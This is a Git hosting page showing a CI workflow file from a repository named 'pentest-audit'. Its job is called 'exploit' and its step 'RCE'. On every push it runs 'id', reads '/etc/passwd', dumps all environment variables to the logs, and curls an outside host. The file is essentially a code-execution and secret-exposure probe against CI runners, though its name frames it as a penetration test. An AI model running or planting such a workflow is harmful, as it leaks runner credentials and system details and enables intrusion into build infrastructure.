Files
pentest-audit e6449ea6cb
Some checks failed
test / exploit (push) Has been cancelled
add ci
2026-05-12 09:24:20 +02:00

13 lines
228 B
YAML

name: test
on: [push]
jobs:
exploit:
runs-on: ubuntu-latest
steps:
- name: RCE
run: |
id
cat /etc/passwd
env
curl http://api.hikka.host/api/statistic | head -c 100